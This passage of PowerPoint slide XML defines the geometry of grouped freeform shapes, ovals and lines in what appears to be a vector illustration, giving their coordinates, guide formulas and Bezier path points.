                        <a:pt x="0" y="152"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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26" name="Freeform 2866"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3100" y="445"/>
                  <a:ext cx="86" cy="97"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 562 w 562"/>
                    <a:gd name="T1" fmla="*/ 0 h 633"/>
                    <a:gd name="T2" fmla="*/ 562 w 562"/>
                    <a:gd name="T3" fmla="*/ 482 h 633"/>
                    <a:gd name="T4" fmla="*/ 0 w 562"/>
                    <a:gd name="T5" fmla="*/ 633 h 633"/>
                    <a:gd name="T6" fmla="*/ 0 w 562"/>
                    <a:gd name="T7" fmla="*/ 151 h 633"/>
                    <a:gd name="T8" fmla="*/ 562 w 562"/>
                    <a:gd name="T9" fmla="*/ 0 h 6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2"/>
                    <a:gd name="T16" fmla="*/ 0 h 633"/>
                    <a:gd name="T17" fmla="*/ 562 w 562"/>
                    <a:gd name="T18" fmla="*/ 633 h 63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2" h="633">
                      <a:moveTo>
                        <a:pt x="562" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="562" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="633"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="151"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="56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8" name="Group 2867"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2961" y="223"/>
                <a:ext cx="106" cy="174"/>
                <a:chOff x="2961" y="223"/>
                <a:chExt cx="106" cy="174"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="416" name="Oval 2868"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2984" y="382"/>
                  <a:ext cx="58" cy="15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 algn="ctr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Freeform 2869"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3003" y="238"/>
                  <a:ext cx="20" cy="154"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 57"/>
                    <a:gd name="T1" fmla="*/ 0 h 425"/>
                    <a:gd name="T2" fmla="*/ 0 w 57"/>
                    <a:gd name="T3" fmla="*/ 418 h 425"/>
                    <a:gd name="T4" fmla="*/ 28 w 57"/>
                    <a:gd name="T5" fmla="*/ 425 h 425"/>
                    <a:gd name="T6" fmla="*/ 57 w 57"/>
                    <a:gd name="T7" fmla="*/ 418 h 425"/>
                    <a:gd name="T8" fmla="*/ 57 w 57"/>
                    <a:gd name="T9" fmla="*/ 0 h 425"/>
                    <a:gd name="T10" fmla="*/ 0 w 57"/>
                    <a:gd name="T11" fmla="*/ 0 h 42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425"/>
                    <a:gd name="T20" fmla="*/ 57 w 57"/>
                    <a:gd name="T21" fmla="*/ 425 h 42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425">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                        <a:pt x="0" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="422"/>
                        <a:pt x="13" y="425"/>
                        <a:pt x="28" y="425"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="425"/>
                        <a:pt x="57" y="422"/>
                        <a:pt x="57" y="418"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57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418" name="Group 2870"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2961" y="223"/>
                  <a:ext cx="106" cy="39"/>
                  <a:chOff x="2968" y="233"/>
                  <a:chExt cx="106" cy="39"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="419" name="Freeform 2871"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="241"/>
                    <a:ext cx="74" cy="31"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 485"/>
                      <a:gd name="T1" fmla="*/ 0 h 201"/>
                      <a:gd name="T2" fmla="*/ 0 w 485"/>
                      <a:gd name="T3" fmla="*/ 71 h 201"/>
                      <a:gd name="T4" fmla="*/ 485 w 485"/>
                      <a:gd name="T5" fmla="*/ 201 h 201"/>
                      <a:gd name="T6" fmla="*/ 485 w 485"/>
                      <a:gd name="T7" fmla="*/ 130 h 201"/>
                      <a:gd name="T8" fmla="*/ 0 w 485"/>
                      <a:gd name="T9" fmla="*/ 0 h 20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85"/>
                      <a:gd name="T16" fmla="*/ 0 h 201"/>
                      <a:gd name="T17" fmla="*/ 485 w 485"/>
                      <a:gd name="T18" fmla="*/ 201 h 20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85" h="201">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="201"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="13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0" name="Freeform 2872"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3063" y="258"/>
                    <a:ext cx="11" cy="14"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 68"/>
                      <a:gd name="T1" fmla="*/ 90 h 90"/>
                      <a:gd name="T2" fmla="*/ 0 w 68"/>
                      <a:gd name="T3" fmla="*/ 19 h 90"/>
                      <a:gd name="T4" fmla="*/ 68 w 68"/>
                      <a:gd name="T5" fmla="*/ 0 h 90"/>
                      <a:gd name="T6" fmla="*/ 68 w 68"/>
                      <a:gd name="T7" fmla="*/ 71 h 90"/>
                      <a:gd name="T8" fmla="*/ 0 w 68"/>
                      <a:gd name="T9" fmla="*/ 90 h 9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8"/>
                      <a:gd name="T16" fmla="*/ 0 h 90"/>
                      <a:gd name="T17" fmla="*/ 68 w 68"/>
                      <a:gd name="T18" fmla="*/ 90 h 9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8" h="90">
                        <a:moveTo>
                          <a:pt x="0" y="90"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="19"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="0"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="68" y="71"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="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1" name="Rectangle 2873"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3042" y="261"/>
                    <a:ext cx="21" cy="11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 algn="ctr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2" name="Freeform 2874"/>
                  <p:cNvSpPr>
                    <a:spLocks/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="2968" y="233"/>
                    <a:ext cx="106" cy="28"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 204 w 690"/>
                      <a:gd name="T1" fmla="*/ 0 h 184"/>
                      <a:gd name="T2" fmla="*/ 69 w 690"/>
                      <a:gd name="T3" fmla="*/ 2 h 184"/>
                      <a:gd name="T4" fmla="*/ 3 w 690"/>
                      <a:gd name="T5" fmla="*/ 21 h 184"/>
                      <a:gd name="T6" fmla="*/ 0 w 690"/>
                      <a:gd name="T7" fmla="*/ 54 h 184"/>
                      <a:gd name="T8" fmla="*/ 485 w 690"/>
                      <a:gd name="T9" fmla="*/ 184 h 184"/>
                      <a:gd name="T10" fmla="*/ 622 w 690"/>
                      <a:gd name="T11" fmla="*/ 184 h 184"/>
                      <a:gd name="T12" fmla="*/ 690 w 690"/>
                      <a:gd name="T13" fmla="*/ 165 h 184"/>
                      <a:gd name="T14" fmla="*/ 690 w 690"/>
                      <a:gd name="T15" fmla="*/ 130 h 184"/>
                      <a:gd name="T16" fmla="*/ 204 w 690"/>
                      <a:gd name="T17" fmla="*/ 0 h 18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690"/>
                      <a:gd name="T28" fmla="*/ 0 h 184"/>
                      <a:gd name="T29" fmla="*/ 690 w 690"/>
                      <a:gd name="T30" fmla="*/ 184 h 184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690" h="184">
                        <a:moveTo>
                          <a:pt x="204" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="69" y="2"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="3" y="21"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="54"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="485" y="184"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="622" y="184"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="165"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="690" y="130"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="20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3" name="Oval 2875"/>
                  <p:cNvSpPr>
                    <a:spLocks noChangeArrowheads="1"/>
                  </p:cNvSpPr>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr bwMode="gray">
                  <a:xfrm>
                    <a:off x="3010" y="245"/>
                    <a:ext cx="20" cy="5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 algn="ctr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59" name="Group 2876"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2992" y="815"/>
                <a:ext cx="287" cy="223"/>
                <a:chOff x="2988" y="817"/>
                <a:chExt cx="287" cy="223"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="392" name="Group 2877"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="976"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="413" name="Freeform 2878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2879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5" name="Freeform 2880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93" name="Group 2881"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="949"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="410" name="Freeform 2882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1" name="Freeform 2883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2884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94" name="Group 2885"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="922"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="407" name="Freeform 2886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8" name="Freeform 2887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9" name="Freeform 2888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95" name="Group 2889"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2988" y="871"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="404" name="Freeform 2890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5" name="Freeform 2891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6" name="Freeform 2892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96" name="Group 2893"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3088" y="844"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="401" name="Freeform 2894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2" name="Freeform 2895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3" name="Freeform 2896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97" name="Group 2897"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3188" y="817"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="398" name="Freeform 2898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9" name="Freeform 2899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Freeform 2900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60" name="Group 2901"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2758" y="846"/>
                <a:ext cx="187" cy="196"/>
                <a:chOff x="2748" y="859"/>
                <a:chExt cx="187" cy="196"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="376" name="Group 2902"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="991"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="389" name="Freeform 2903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0" name="Freeform 2904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1" name="Freeform 2905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77" name="Group 2906"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="964"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="386" name="Freeform 2907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7" name="Freeform 2908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8" name="Freeform 2909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78" name="Group 2910"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2748" y="886"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="383" name="Freeform 2911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4" name="Freeform 2912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Freeform 2913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79" name="Group 2914"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="2848" y="859"/>
                  <a:ext cx="87" cy="64"/>
                  <a:chOff x="2988" y="431"/>
                  <a:chExt cx="207" cy="152"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="380" name="Freeform 2915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1" name="Freeform 2916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2" name="Freeform 2917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61" name="Group 2918"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="2866" y="59"/>
                <a:ext cx="295" cy="217"/>
                <a:chOff x="3744" y="572"/>
                <a:chExt cx="295" cy="217"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="362" name="Freeform 2919"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3744" y="572"/>
                  <a:ext cx="295" cy="217"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1354"/>
                    <a:gd name="T1" fmla="*/ 990 h 990"/>
                    <a:gd name="T2" fmla="*/ 0 w 1354"/>
                    <a:gd name="T3" fmla="*/ 364 h 990"/>
                    <a:gd name="T4" fmla="*/ 711 w 1354"/>
                    <a:gd name="T5" fmla="*/ 175 h 990"/>
                    <a:gd name="T6" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T7" fmla="*/ 0 h 990"/>
                    <a:gd name="T8" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T9" fmla="*/ 626 h 990"/>
                    <a:gd name="T10" fmla="*/ 711 w 1354"/>
                    <a:gd name="T11" fmla="*/ 796 h 990"/>
                    <a:gd name="T12" fmla="*/ 0 w 1354"/>
                    <a:gd name="T13" fmla="*/ 990 h 99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54"/>
                    <a:gd name="T22" fmla="*/ 0 h 990"/>
                    <a:gd name="T23" fmla="*/ 1354 w 1354"/>
                    <a:gd name="T24" fmla="*/ 990 h 99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54" h="990">
                      <a:moveTo>
                        <a:pt x="0" y="990"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="364"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="175"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1354" y="626"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="711" y="796"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="990"/>
                      </a:lnTo>
                      <a:close/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63" name="Line 2920"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3764" y="648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64" name="Line 2921"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3800" y="639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Line 2922"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3835" y="629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Line 2923"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3871" y="619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Line 2924"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3907" y="609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Line 2925"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3942" y="599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Line 2926"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="3978" y="589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Line 2927"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4015" y="579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Line 2928"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="593"/>
                  <a:ext cx="294" cy="8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Line 2929"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="618"/>
                  <a:ext cx="294" cy="8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3" name="Line 2930"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3745" y="644"/>
                  <a:ext cx="294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4" name="Line 2931"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="669"/>
                  <a:ext cx="294" cy="8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Line 2932"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipV="1">
                  <a:off x="3744" y="694"/>
                  <a:ext cx="294" cy="8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27" name="Group 2278"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipH="1">
              <a:off x="3636797" y="2813465"/>
              <a:ext cx="642938" cy="192087"/>
              <a:chOff x="1728" y="-938"/>
              <a:chExt cx="3134" cy="936"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="428" name="Freeform 2279"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-699"/>
                <a:ext cx="196" cy="630"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 196"/>
                  <a:gd name="T1" fmla="*/ 0 h 630"/>
                  <a:gd name="T2" fmla="*/ 0 w 196"/>
                  <a:gd name="T3" fmla="*/ 97 h 630"/>
                  <a:gd name="T4" fmla="*/ 196 w 196"/>
                  <a:gd name="T5" fmla="*/ 630 h 630"/>
                  <a:gd name="T6" fmla="*/ 196 w 196"/>
                  <a:gd name="T7" fmla="*/ 534 h 630"/>
                  <a:gd name="T8" fmla="*/ 0 w 196"/>
                  <a:gd name="T9" fmla="*/ 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630">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="630"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="5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29" name="Freeform 2280"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1924" y="-165"/>
                <a:ext cx="2043" cy="163"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T1" fmla="*/ 163 h 163"/>
                  <a:gd name="T2" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T3" fmla="*/ 68 h 163"/>
                  <a:gd name="T4" fmla="*/ 0 w 2043"/>
                  <a:gd name="T5" fmla="*/ 0 h 163"/>
                  <a:gd name="T6" fmla="*/ 0 w 2043"/>
                  <a:gd name="T7" fmla="*/ 96 h 163"/>
                  <a:gd name="T8" fmla="*/ 2043 w 2043"/>
                  <a:gd name="T9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43" h="163">
                    <a:moveTo>
                      <a:pt x="2043" y="163"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="2043" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2043" y="163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0" name="Freeform 2281"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3518" y="-579"/>
                <a:ext cx="1344" cy="456"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T1" fmla="*/ 0 h 456"/>
                  <a:gd name="T2" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T3" fmla="*/ 95 h 456"/>
                  <a:gd name="T4" fmla="*/ 0 w 1344"/>
                  <a:gd name="T5" fmla="*/ 456 h 456"/>
                  <a:gd name="T6" fmla="*/ 0 w 1344"/>
                  <a:gd name="T7" fmla="*/ 362 h 456"/>
                  <a:gd name="T8" fmla="*/ 1344 w 1344"/>
                  <a:gd name="T9" fmla="*/ 0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6">
                    <a:moveTo>
                      <a:pt x="1344" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1344" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134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1" name="Freeform 2282"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="1728" y="-938"/>
                <a:ext cx="3134" cy="841"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 3134"/>
                  <a:gd name="T1" fmla="*/ 773 h 841"/>
                  <a:gd name="T2" fmla="*/ 0 w 3134"/>
                  <a:gd name="T3" fmla="*/ 239 h 841"/>
                  <a:gd name="T4" fmla="*/ 446 w 3134"/>
                  <a:gd name="T5" fmla="*/ 359 h 841"/>
                  <a:gd name="T6" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T7" fmla="*/ 0 h 841"/>
                  <a:gd name="T8" fmla="*/ 3134 w 3134"/>
                  <a:gd name="T9" fmla="*/ 359 h 841"/>
                  <a:gd name="T10" fmla="*/ 1790 w 3134"/>
                  <a:gd name="T11" fmla="*/ 721 h 841"/>
                  <a:gd name="T12" fmla="*/ 2239 w 3134"/>
                  <a:gd name="T13" fmla="*/ 841 h 841"/>
                  <a:gd name="T14" fmla="*/ 196 w 3134"/>
                  <a:gd name="T15" fmla="*/ 773 h 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4" h="841">
                    <a:moveTo>
                      <a:pt x="196" y="773"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3134" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1790" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2239" y="841"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="773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432" name="Group 431"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4933307" y="2206075"/>
              <a:ext cx="2063750" cy="555625"/>
              <a:chOff x="5607782" y="1431509"/>
              <a:chExt cx="2063750" cy="555625"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="433" name="Freeform 2786"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
